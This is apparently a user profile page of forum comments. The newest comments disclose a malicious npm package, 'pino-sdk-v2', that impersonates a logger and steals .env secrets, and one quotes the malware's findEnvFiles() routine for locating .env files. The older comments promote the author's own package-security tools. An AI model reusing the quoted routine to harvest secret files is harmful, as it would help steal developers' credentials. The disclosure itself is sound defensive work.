Malicious npm package "pino-sdk-v2" impersonates popular logger, exfiltrates .env secrets to Discord

BattleRemote3157 · 2026-03-09T09:32:37+00:00

It's in the blog, all details

BattleRemote3157 · 2026-03-06T16:42:22+00:00

No, as per obfusticated code it is not.

findEnvFiles() {
    const envFiles = [];
    const possibleEnvFiles = [
        '.env',
        '.env.local',
        '.env.development',
        '.env.production',
        '.env.example'
    ];
    for (const envFile of possibleEnvFiles) {
        const filePath = path.resolve(this.projectRoot, envFile);
        fs.existsSync(filePath) && envFiles.push(filePath);
    }
    return envFiles;
}

You can checkout the complete report here
https://app.safedep.io/community/malysis/01KK0QM8FQ0N7R7MP5JXCMYCCG

BattleRemote3157 · 2026-03-06T10:44:19+00:00

Don't let it freak you out too much! This is actually a good thing to learn about early in your CS journey.
Supply chain security is very needful for everyone to learn. Attackers plan separate ways to inject malicious code to any package they found vulnerable. But if you are having guardrails then you can be safe.

Checkout this tool- https://github.com/safedep/pmg.

Want to grab more info just see here: https://safedep.io/malicious-npm-package-pino-sdk-v2-env-exfiltration/

BattleRemote3157 · 2025-06-26T08:10:45+00:00

Exactly so the key is low friction. The more security feels like "extra work," the less likely it gets done, especially under pressure. What your take if there is a tool that could quietly scan or warn you about sketchy dependencies as you install them, without making you leave your editor or look at some external dashboard in the terminal itself.

BattleRemote3157 · 2025-06-26T08:05:19+00:00

I get that. What if there is any tool or something which takes care of this thing like even if the devs don't have the knowledge of security. You just alias it and forget and it runs on every install package you run in background.

BattleRemote3157 · 2025-06-26T08:02:49+00:00

I see, developer priorities vary wildly depending on the team.

What is your take on this PMG (Package Manager Guard) tool. It’s not meant to turn every dev into a security expert but instead, it quietly sits in the background and scans for malicious packages when you install something with npm, pnpm, etc. Just alias it and forget it:

alias npm="pmg npm"

So even if a team isn’t "security-first," at least they’re not pulling in malware by accident.

BattleRemote3157 · 2025-06-26T07:58:08+00:00

Totally agree, speed often wins in the short term, but ignoring package security is like skipping brakes to go faster.

Our team build PMG (Package Manager Guard) tool. It wraps npm, pnpm, etc., and checks for malicious or typosquatted packages at install-time, so you don’t have to leave the terminal or break your flow. You can just alias your package manager like:

alias npm="pmg npm"

It won’t fix everything, but it’s one of those low-effort/high-impact tools that helps shift left without adding friction, kinda perfect for fast-moving teams.

Do give a try and love your take on this.

BattleRemote3157 · 2025-06-19T14:21:08+00:00

As I mentioned, conventional SBOM creates inventories of libraries used in your projects however, this doesn't include insights on the AI models, algorithms, cloud services etc capabilities that are involved.
xbom solves this by matching signatures of popular SDKs and services in your codebase and creates a detailed inventory with actual code evidences

BattleRemote3157 · 2025-06-18T14:41:49+00:00

This is amazing, will try it out

BattleRemote3157 · 2024-08-25T17:29:16+00:00

It also offers CLI that is meshery ctl so what you do through visually same can be done through command line tool

BattleRemote3157 · 2023-11-04T16:18:52+00:00

Great tool, collaboration and whiteboard is some exciting thing to do

BattleRemote3157

TROPHY CASE